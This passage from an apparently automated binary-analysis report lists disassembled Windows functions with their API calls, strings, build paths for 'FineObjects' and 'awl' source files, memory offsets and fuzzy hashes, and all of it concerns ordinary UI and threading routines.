                                                                                                • Associated: 00000010.00000002.554138571.0000000000530000.00000008.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554182353.0000000000536000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: Interlocked$DecrementIncrement
                                                                                                • String ID: xMS
                                                                                                • API String ID: 2172605799-303485436
                                                                                                • Opcode ID: e4fb97681a50d62440e5e434d6a8ae38ac44998d4887eccd301dbbc3d338fce9
                                                                                                • Instruction ID: a9696cf7f4c9a2842dbbdceff2b8fda2d90dcfda711cdb1a2a65d97af617a939
                                                                                                • Opcode Fuzzy Hash: e4fb97681a50d62440e5e434d6a8ae38ac44998d4887eccd301dbbc3d338fce9
                                                                                                • Instruction Fuzzy Hash: 31219A72600700ABC720EF69DD54B6EBBA8FB95720F10466EF821973D1CB786900DB98
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                Strings
                                                                                                • @fO, xrefs: 00459129
                                                                                                • d:\build\teamagent\_work\1\s\0\awl\src\stateflowanimationawl.cpp, xrefs: 0045911F
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000010.00000002.553281398.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000010.00000002.553276242.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.553907614.00000000004F0000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554113841.000000000052F000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554138571.0000000000530000.00000008.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554182353.0000000000536000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: Release
                                                                                                • String ID: @fO$d:\build\teamagent\_work\1\s\0\awl\src\stateflowanimationawl.cpp
                                                                                                • API String ID: 1375353473-1737998571
                                                                                                • Opcode ID: f182dda68bfce65f70ea1c116ba6513b9a3706f4820638bcba235f0656bdb83a
                                                                                                • Instruction ID: bf78f29f8d91800a4cd6460ace3a33bb1cbec86219839ecb1a8ee6c56e50655d
                                                                                                • Opcode Fuzzy Hash: f182dda68bfce65f70ea1c116ba6513b9a3706f4820638bcba235f0656bdb83a
                                                                                                • Instruction Fuzzy Hash: 77219131A00615DFDB20CF68C845BABBBB4FB04711F104A6AE856A72D2D779A908CB94
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                Strings
                                                                                                • @fO, xrefs: 0043E377
                                                                                                • d:\build\teamagent\_work\1\s\0\awl\src\scrollingawl.cpp, xrefs: 0043E36D
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000010.00000002.553281398.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000010.00000002.553276242.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.553907614.00000000004F0000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554113841.000000000052F000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554138571.0000000000530000.00000008.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554182353.0000000000536000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: InfoScroll
                                                                                                • String ID: @fO$d:\build\teamagent\_work\1\s\0\awl\src\scrollingawl.cpp
                                                                                                • API String ID: 629608716-962132537
                                                                                                • Opcode ID: 6a5138a9fd5da4fef220b5f03db8858cea6913bd9d7e7a36f0a2d4585afd2cfc
                                                                                                • Instruction ID: ed64f32234b731d9c93d3c2cc4a7135e6670d91032c70dedb65b72c6ed78df36
                                                                                                • Opcode Fuzzy Hash: 6a5138a9fd5da4fef220b5f03db8858cea6913bd9d7e7a36f0a2d4585afd2cfc
                                                                                                • Instruction Fuzzy Hash: F51127316463009BD7209E23898167FB3A4EBD8314F10692FFD5147281E779ED96C799
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • IsWindow.USER32(?), ref: 00451398
                                                                                                • InterlockedDecrement.KERNEL32(?), ref: 004513D4
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000010.00000002.553281398.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000010.00000002.553276242.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.553907614.00000000004F0000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554113841.000000000052F000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554138571.0000000000530000.00000008.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554182353.0000000000536000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: DecrementInterlockedWindow
                                                                                                • String ID: xMS
                                                                                                • API String ID: 796432368-303485436
                                                                                                • Opcode ID: d02cfde42aa2b5bc22df962a51aaf5d25e2fd725dd6853673ca8624b9d05b19f
                                                                                                • Instruction ID: a06638f939e81c93a856a0e9ec87aaaf242a2adc030129e4746179f10a8fb2af
                                                                                                • Opcode Fuzzy Hash: d02cfde42aa2b5bc22df962a51aaf5d25e2fd725dd6853673ca8624b9d05b19f
                                                                                                • Instruction Fuzzy Hash: 9821FF75500681EBEB20CF58C900BEABBA9EF80711F04465EFC55A7781D7B8AA04C7A4
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                  • Part of subcall function 0041B8C0: InterlockedIncrement.KERNEL32(?), ref: 0041B902
                                                                                                • InterlockedDecrement.KERNEL32(00000004), ref: 0041C184
                                                                                                  • Part of subcall function 0046C890: EnterCriticalSection.KERNEL32(00534BE8,00000001,?), ref: 0046C8C5
                                                                                                  • Part of subcall function 0046C890: LeaveCriticalSection.KERNEL32(00534BE8), ref: 0046C8E8
                                                                                                  • Part of subcall function 0046C890: TlsGetValue.KERNEL32 ref: 0046C914
                                                                                                  • Part of subcall function 0046C890: TlsSetValue.KERNEL32(0053011C), ref: 0046C935
                                                                                                  • Part of subcall function 0046C890: __CxxThrowException@8.LIBVCRUNTIME ref: 0046C9E3
                                                                                                Strings
                                                                                                • @fO, xrefs: 0041C13A
                                                                                                • D:\Build.Agent\TeamAgent\_work\1\s\Build\0\FineObjects\Inc\Object.h, xrefs: 0041C130
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000010.00000002.553281398.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000010.00000002.553276242.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.553907614.00000000004F0000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554113841.000000000052F000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554138571.0000000000530000.00000008.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554182353.0000000000536000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: CriticalInterlockedSectionValue$DecrementEnterException@8IncrementLeaveThrow
                                                                                                • String ID: @fO$D:\Build.Agent\TeamAgent\_work\1\s\Build\0\FineObjects\Inc\Object.h
                                                                                                • API String ID: 3915468703-2929781898
                                                                                                • Opcode ID: f58604d2d9f616bafe372d028f2a56bdf34474b478b584c4dbc87e468809f8f9
                                                                                                • Instruction ID: a8cbdad54d51396ff69e3bbb26c56a9fd9652ee3b91635b912f053bb91cfeee8
                                                                                                • Opcode Fuzzy Hash: f58604d2d9f616bafe372d028f2a56bdf34474b478b584c4dbc87e468809f8f9
                                                                                                • Instruction Fuzzy Hash: 5521AE76A80244EBCB10DF58CD45BAAF7B5FB88701F10866EE905AB781D7B99900CBD4
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                  • Part of subcall function 0041B8C0: InterlockedIncrement.KERNEL32(?), ref: 0041B902
                                                                                                • InterlockedDecrement.KERNEL32(00000004), ref: 0041C310
                                                                                                  • Part of subcall function 0046C890: EnterCriticalSection.KERNEL32(00534BE8,00000001,?), ref: 0046C8C5
                                                                                                  • Part of subcall function 0046C890: LeaveCriticalSection.KERNEL32(00534BE8), ref: 0046C8E8
                                                                                                  • Part of subcall function 0046C890: TlsGetValue.KERNEL32 ref: 0046C914
                                                                                                  • Part of subcall function 0046C890: TlsSetValue.KERNEL32(0053011C), ref: 0046C935
                                                                                                  • Part of subcall function 0046C890: __CxxThrowException@8.LIBVCRUNTIME ref: 0046C9E3
                                                                                                Strings
                                                                                                • @fO, xrefs: 0041C2CA
                                                                                                • D:\Build.Agent\TeamAgent\_work\1\s\Build\0\FineObjects\Inc\Object.h, xrefs: 0041C2C0
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000010.00000002.553281398.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000010.00000002.553276242.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.553907614.00000000004F0000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554113841.000000000052F000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554138571.0000000000530000.00000008.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554182353.0000000000536000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: CriticalInterlockedSectionValue$DecrementEnterException@8IncrementLeaveThrow
                                                                                                • String ID: @fO$D:\Build.Agent\TeamAgent\_work\1\s\Build\0\FineObjects\Inc\Object.h
                                                                                                • API String ID: 3915468703-2929781898
                                                                                                • Opcode ID: aec06b88a38501b9f1ad04bba0ae3cd942b38ea0b2eca0386e819b97f0920a99
                                                                                                • Instruction ID: 2d3a3f199dfaf50bdbcc238ed67b02ff25e64cd0307915704d2069890ef9ffc0
                                                                                                • Opcode Fuzzy Hash: aec06b88a38501b9f1ad04bba0ae3cd942b38ea0b2eca0386e819b97f0920a99
                                                                                                • Instruction Fuzzy Hash: 70219D76A40208ABCB10DF98D945BAAFBB4FB48715F10825EED15AB780D7B99904CBC4
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                  • Part of subcall function 0041B8C0: InterlockedIncrement.KERNEL32(?), ref: 0041B902
                                                                                                • InterlockedDecrement.KERNEL32(00000004), ref: 0041C4B0
                                                                                                  • Part of subcall function 0046C890: EnterCriticalSection.KERNEL32(00534BE8,00000001,?), ref: 0046C8C5
                                                                                                  • Part of subcall function 0046C890: LeaveCriticalSection.KERNEL32(00534BE8), ref: 0046C8E8
                                                                                                  • Part of subcall function 0046C890: TlsGetValue.KERNEL32 ref: 0046C914
                                                                                                  • Part of subcall function 0046C890: TlsSetValue.KERNEL32(0053011C), ref: 0046C935
                                                                                                  • Part of subcall function 0046C890: __CxxThrowException@8.LIBVCRUNTIME ref: 0046C9E3
                                                                                                Strings
                                                                                                • @fO, xrefs: 0041C46A
                                                                                                • D:\Build.Agent\TeamAgent\_work\1\s\Build\0\FineObjects\Inc\Object.h, xrefs: 0041C460
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000010.00000002.553281398.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000010.00000002.553276242.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.553907614.00000000004F0000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554113841.000000000052F000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554138571.0000000000530000.00000008.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554182353.0000000000536000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: CriticalInterlockedSectionValue$DecrementEnterException@8IncrementLeaveThrow
                                                                                                • String ID: @fO$D:\Build.Agent\TeamAgent\_work\1\s\Build\0\FineObjects\Inc\Object.h
                                                                                                • API String ID: 3915468703-2929781898
                                                                                                • Opcode ID: 6d64714549dd0e2fd9158733c41fd43c8587f8cfefce0ebb34d4acee31d885c2
                                                                                                • Instruction ID: 686367f06c6549a34f961bcd1bfbb867f70530b32946672747318296b593a877
                                                                                                • Opcode Fuzzy Hash: 6d64714549dd0e2fd9158733c41fd43c8587f8cfefce0ebb34d4acee31d885c2
                                                                                                • Instruction Fuzzy Hash: 4D219D76A40208ABC710DF98C945BAAFBB4FB48701F10825EE905AB780D7B99904CBC4
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                  • Part of subcall function 0041B8C0: InterlockedIncrement.KERNEL32(?), ref: 0041B902
                                                                                                • InterlockedDecrement.KERNEL32(0000000100000003), ref: 0041C3D1
                                                                                                  • Part of subcall function 0046C890: EnterCriticalSection.KERNEL32(00534BE8,00000001,?), ref: 0046C8C5
                                                                                                  • Part of subcall function 0046C890: LeaveCriticalSection.KERNEL32(00534BE8), ref: 0046C8E8
                                                                                                  • Part of subcall function 0046C890: TlsGetValue.KERNEL32 ref: 0046C914
                                                                                                  • Part of subcall function 0046C890: TlsSetValue.KERNEL32(0053011C), ref: 0046C935
                                                                                                  • Part of subcall function 0046C890: __CxxThrowException@8.LIBVCRUNTIME ref: 0046C9E3
                                                                                                Strings
                                                                                                • @fO, xrefs: 0041C391
                                                                                                • D:\Build.Agent\TeamAgent\_work\1\s\Build\0\FineObjects\Inc\Object.h, xrefs: 0041C387
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000010.00000002.553281398.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000010.00000002.553276242.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.553907614.00000000004F0000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554113841.000000000052F000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554138571.0000000000530000.00000008.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554182353.0000000000536000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: CriticalInterlockedSectionValue$DecrementEnterException@8IncrementLeaveThrow
                                                                                                • String ID: @fO$D:\Build.Agent\TeamAgent\_work\1\s\Build\0\FineObjects\Inc\Object.h
                                                                                                • API String ID: 3915468703-2929781898
                                                                                                • Opcode ID: c4de49dad572278c31d5786b2f1080b8fd49d67ef0e95adc845759f7eb4ea451
                                                                                                • Instruction ID: 4f755d07b5a4532d96c4d43deaf82243b2810d093dc8e1fd1ee09f3bd05ac5c8
                                                                                                • Opcode Fuzzy Hash: c4de49dad572278c31d5786b2f1080b8fd49d67ef0e95adc845759f7eb4ea451
                                                                                                • Instruction Fuzzy Hash: 0321AF72B40208EFC720CF58DC45BAAB7A4EB45B10F10866EE925EB390DB799900CB84
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • InterlockedDecrement.KERNEL32(0041368C), ref: 00469272
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000010.00000002.553281398.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000010.00000002.553276242.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.553907614.00000000004F0000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554113841.000000000052F000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554138571.0000000000530000.00000008.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554182353.0000000000536000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: DecrementInterlocked
                                                                                                • String ID: xMS$xMS
                                                                                                • API String ID: 3448037634-1285152028
                                                                                                • Opcode ID: ae9d57aefe988c746fb1490a3f73ad4144aa50cc05b7e3cbf9f079187bb811ac
                                                                                                • Instruction ID: 08b87919f2b59ad95c11dd8ccd5e37e3c0ec9cbbb59900b8af171780600099e1
                                                                                                • Opcode Fuzzy Hash: ae9d57aefe988c746fb1490a3f73ad4144aa50cc05b7e3cbf9f079187bb811ac
                                                                                                • Instruction Fuzzy Hash: E1216AB2600A14AFC700CF49C880B9ABBE8FF49720F00866AF519DB750D775E901CBD0
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • InterlockedDecrement.KERNEL32(?), ref: 0040C428
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000010.00000002.553281398.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000010.00000002.553276242.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.553907614.00000000004F0000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554113841.000000000052F000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554138571.0000000000530000.00000008.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554182353.0000000000536000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: DecrementInterlocked
                                                                                                • String ID: 8TS$xMS
                                                                                                • API String ID: 3448037634-743177014
                                                                                                • Opcode ID: aec386238a8868dbe976a74fac0508ffcdfbd4cd51a228922ca981cf7aaf590f
                                                                                                • Instruction ID: 2983fbb669400d506c715a4620336a2e628e48b365ce161ae837b0e989f35339
                                                                                                • Opcode Fuzzy Hash: aec386238a8868dbe976a74fac0508ffcdfbd4cd51a228922ca981cf7aaf590f
                                                                                                • Instruction Fuzzy Hash: F2112731A40648EFCB10DF99C891BBFBBA9EB82714F14426AE840B33C2D7395900C795
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • GetProcAddress.KERNEL32(?,OpenThemeData), ref: 0044D0BC
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000010.00000002.553281398.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000010.00000002.553276242.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.553907614.00000000004F0000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554113841.000000000052F000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554138571.0000000000530000.00000008.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554182353.0000000000536000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: AddressProc
                                                                                                • String ID: OpenThemeData$UxTheme.dll
                                                                                                • API String ID: 190572456-2669680030
                                                                                                • Opcode ID: 859778764f2b45d4d8c02abe36d0e52e95a704f305929c85752296c7db44e879
                                                                                                • Instruction ID: 145d011c31da6563c18856585aba04a174aee683788c58e83bc7226b799b0286
                                                                                                • Opcode Fuzzy Hash: 859778764f2b45d4d8c02abe36d0e52e95a704f305929c85752296c7db44e879
                                                                                                • Instruction Fuzzy Hash: 5911AC71A08A04DBDB14CF5CA9907697BE4F718719F10836FE81AD3B80E7795901BB45
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • InterlockedIncrement.KERNEL32(00530380), ref: 00439205
                                                                                                  • Part of subcall function 00487430: EnterCriticalSection.KERNEL32(00535528), ref: 0048745E
                                                                                                  • Part of subcall function 00487430: InterlockedIncrement.KERNEL32(?), ref: 004874E0
                                                                                                  • Part of subcall function 00487430: LoadStringW.USER32(00000000,?,?,00000002), ref: 00487538
                                                                                                  • Part of subcall function 00487430: InterlockedDecrement.KERNEL32(00000001), ref: 00487579
                                                                                                • InterlockedDecrement.KERNEL32(?), ref: 0043923D
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000010.00000002.553281398.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000010.00000002.553276242.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.553907614.00000000004F0000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554113841.000000000052F000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554138571.0000000000530000.00000008.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554182353.0000000000536000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: Interlocked$DecrementIncrement$CriticalEnterLoadSectionString
                                                                                                • String ID: xMS
                                                                                                • API String ID: 578687994-303485436
                                                                                                • Opcode ID: 9a20ec56a27ab26a20c0ebed51918242d080b164bad689409618602d12131402
                                                                                                • Instruction ID: ae697f850b95b96c056a15dbcfe8a646adbcc088e5ba7be6bbcbe079f510de9e
                                                                                                • Opcode Fuzzy Hash: 9a20ec56a27ab26a20c0ebed51918242d080b164bad689409618602d12131402
                                                                                                • Instruction Fuzzy Hash: EB113671A40614BBCB109F558C01BFF7BA9FB45B28F000A6EF81593381EBB99D05C69A
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                • GetProcAddress.KERNEL32(?,CloseThemeData), ref: 0044D18C
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000010.00000002.553281398.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000010.00000002.553276242.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.553907614.00000000004F0000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554113841.000000000052F000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554138571.0000000000530000.00000008.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554182353.0000000000536000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: AddressProc
                                                                                                • String ID: CloseThemeData$UxTheme.dll
                                                                                                • API String ID: 190572456-2595282165
                                                                                                • Opcode ID: ff45a36a758d5218b02ec0166ded1827d017f51192cbffa9a6713728b4731c00
                                                                                                • Instruction ID: 3ced4f32de845482c459cf46ee0f087a4cb45d21243ddbb7943058130e3f670f
                                                                                                • Opcode Fuzzy Hash: ff45a36a758d5218b02ec0166ded1827d017f51192cbffa9a6713728b4731c00
                                                                                                • Instruction Fuzzy Hash: 7E11EF31E05B45DFDB10DF68D980B997BE4FB19724F20036AE815D3BA0E7789900BB84
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                  • Part of subcall function 0044AE90: GetLastError.KERNEL32(?,0044B317,00000000,00000000,00000000,74E04D40,?,?,?,00000000,004E13EE,000000FF,?,00452DA3), ref: 0044AEEB
                                                                                                • GetDeviceCaps.GDI32(@Mt,0000005A), ref: 0044B324
                                                                                                • ReleaseDC.USER32 ref: 0044B343
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000010.00000002.553281398.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000010.00000002.553276242.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.553907614.00000000004F0000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554113841.000000000052F000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554138571.0000000000530000.00000008.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554182353.0000000000536000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: CapsDeviceErrorLastRelease
                                                                                                • String ID: @Mt
                                                                                                • API String ID: 858183236-1491384996
                                                                                                • Opcode ID: ed00b81809a344cc8c7390f3ba541ce433cac704d18833fef5b375cc2380afc9
                                                                                                • Instruction ID: 767c49ddbdbf62a3e1c07cec5139a83c92d388967912012839f1a724874d8742
                                                                                                • Opcode Fuzzy Hash: ed00b81809a344cc8c7390f3ba541ce433cac704d18833fef5b375cc2380afc9
                                                                                                • Instruction Fuzzy Hash: 6D118C71A00208AFDB10DF85CC45BAEBBB8FB89724F104229F915AB3D1CB355E10CBA4
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                  • Part of subcall function 00473290: InterlockedDecrement.KERNEL32(00000000), ref: 00473314
                                                                                                  • Part of subcall function 00473290: InterlockedDecrement.KERNEL32(?), ref: 00473330
                                                                                                  • Part of subcall function 00473290: InterlockedIncrement.KERNEL32 ref: 0047335E
                                                                                                  • Part of subcall function 00473290: RegCloseKey.ADVAPI32(00000000,00000000,?,004F6640,80000001,0000010B,00000000,00000000), ref: 004733B0
                                                                                                  • Part of subcall function 00473290: SetLastError.KERNEL32(00000000), ref: 004733B7
                                                                                                  • Part of subcall function 00473290: InterlockedDecrement.KERNEL32(00530380), ref: 004733C1
                                                                                                  • Part of subcall function 00473290: InterlockedDecrement.KERNEL32(000000FF), ref: 004733DA
                                                                                                • InterlockedDecrement.KERNEL32(?), ref: 004730FC
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000010.00000002.553281398.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000010.00000002.553276242.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.553907614.00000000004F0000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554113841.000000000052F000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554138571.0000000000530000.00000008.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554182353.0000000000536000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: Interlocked$Decrement$CloseErrorIncrementLast
                                                                                                • String ID: BreakOnMemoryException$xMS
                                                                                                • API String ID: 3260267881-3216249449
                                                                                                • Opcode ID: 6373ed9e3168d18e2f4b3217b97e681dd43148d9dbd6eb4d177326151317daa5
                                                                                                • Instruction ID: 7cc56b3eaa9327931338969b07dec58a9015e463352a1b5837e1d948a8906d96
                                                                                                • Opcode Fuzzy Hash: 6373ed9e3168d18e2f4b3217b97e681dd43148d9dbd6eb4d177326151317daa5
                                                                                                • Instruction Fuzzy Hash: BE11E772A04644ABD710DF58E8417AEBBB8FB45B25F00827EE40993381D7395E04C795
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                  • Part of subcall function 0041B8C0: InterlockedIncrement.KERNEL32(?), ref: 0041B902
                                                                                                • InterlockedDecrement.KERNEL32(0000000100000003), ref: 0041C253
                                                                                                  • Part of subcall function 0046C890: EnterCriticalSection.KERNEL32(00534BE8,00000001,?), ref: 0046C8C5
                                                                                                  • Part of subcall function 0046C890: LeaveCriticalSection.KERNEL32(00534BE8), ref: 0046C8E8
                                                                                                  • Part of subcall function 0046C890: TlsGetValue.KERNEL32 ref: 0046C914
                                                                                                  • Part of subcall function 0046C890: TlsSetValue.KERNEL32(0053011C), ref: 0046C935
                                                                                                  • Part of subcall function 0046C890: __CxxThrowException@8.LIBVCRUNTIME ref: 0046C9E3
                                                                                                Strings
                                                                                                • @fO, xrefs: 0041C212
                                                                                                • D:\Build.Agent\TeamAgent\_work\1\s\Build\0\FineObjects\Inc\Object.h, xrefs: 0041C208
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000010.00000002.553281398.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000010.00000002.553276242.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.553907614.00000000004F0000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554113841.000000000052F000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554138571.0000000000530000.00000008.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554182353.0000000000536000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: CriticalInterlockedSectionValue$DecrementEnterException@8IncrementLeaveThrow
                                                                                                • String ID: @fO$D:\Build.Agent\TeamAgent\_work\1\s\Build\0\FineObjects\Inc\Object.h
                                                                                                • API String ID: 3915468703-2929781898
                                                                                                • Opcode ID: db274578801f6921bf6872a4cde278db7d73569f1bc315b9f6b0614e75c6bc2f
                                                                                                • Instruction ID: 23db4c1f53c2840085fc3255e1fa4dc3b15d306a5ae3f9f142401e3d52877678
                                                                                                • Opcode Fuzzy Hash: db274578801f6921bf6872a4cde278db7d73569f1bc315b9f6b0614e75c6bc2f
                                                                                                • Instruction Fuzzy Hash: 0311C131A80214EFC720CF94CC86FAAB7A4EB09B10F10865EED16AB3C1D7799D00CB94
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                APIs
                                                                                                Strings
                                                                                                • d:\build\teamagent\_work\1\s\0\awl\src\framewindowawl.cpp, xrefs: 0042C37B
                                                                                                • @fO, xrefs: 0042C385
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000010.00000002.553281398.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000010.00000002.553276242.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.553907614.00000000004F0000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554113841.000000000052F000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554138571.0000000000530000.00000008.00020000.sdmp Download File
                                                                                                • Associated: 00000010.00000002.554182353.0000000000536000.00000002.00020000.sdmp Download File
                                                                                                Similarity
